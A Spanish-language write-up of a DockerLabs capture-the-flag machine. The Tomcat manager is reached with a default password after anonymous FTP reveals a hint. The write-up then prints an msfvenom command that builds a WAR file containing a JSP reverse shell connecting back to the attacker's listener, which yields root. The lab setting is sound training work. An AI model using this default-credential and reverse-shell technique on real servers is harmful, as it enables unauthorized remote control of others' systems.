Para poder hacer uso de esta máquina primero debemos descargar los archivos y así desplegarlo con Docker.
Descargamos el archivo de la página dockerlabs.es/#
Al momento de descargar esta máquina y descomprimir el archivo, en este caso observamos 2 archivos
Para desplegar el laboratorio ejecutamos de la siguiente manera, así también podemos ver que nos indica la dirección que tendremos, así también el que hacer cuando terminemos este.
Para empezar primero realizamos un escaneo de puertos y podemos observar que tenemos el puerto 21 y el 8080.
Primero ingresamos al servicio FTP, ya que se puede usar el acceso anónimo. Y podemos observar que tenemos un archivo llamado tomcat.txt y copiamos el archivo en nuestra máquina usando get.
Leemos el archivo y podemos observar un mensaje que indica que perdieron el password.
Ingresamos a la dirección web con el puerto 8080 y podemos ver la página de inicio de apache Tomcat, la cual al parecer es la versión 9.0.88.
Para poder acceder en Tomcat debemos hacer clic en managerwebapp y nos saldrá el siguiente popup que nos pide ingresar las credenciales en la siguiente página encontramos una lista de credenciales por defecto https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat probamos cada una de ellas y la que nos permite ingresar es s3cr3t:
Otra opción también es darle a cancelar y nos muestra las credenciales, aunque no siempre funciona como en este caso, nos muestra s3cret y ese no es el password.
Una vez dentro podemos observar que tenemos la opción de subir war files y mediante ello podemos conectarnos. El comando sería
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.5 LPORT=1234 -f war > shell.war
ejecutamos el archivo y podemos observar que ya tenemos un archivo .war que nos servirá para establecer una shell.
Una vez tenemos el archivo y antes de subirlo iniciamos nuestro listener.
Una vez subido le damos a Deploy.
Si se subió de manera correcta podremos ver que en aplicaciones ya aparece nuestro archivo como /shell, damos clic en él y nos llevará a una página en blanco.
Pero en nuestro listener ya podemos observar que se estableció conexión y si hacemos un whoami, podemos observar que no necesitamos escalar privilegios debido a que ya somos root, culminando esta máquina.
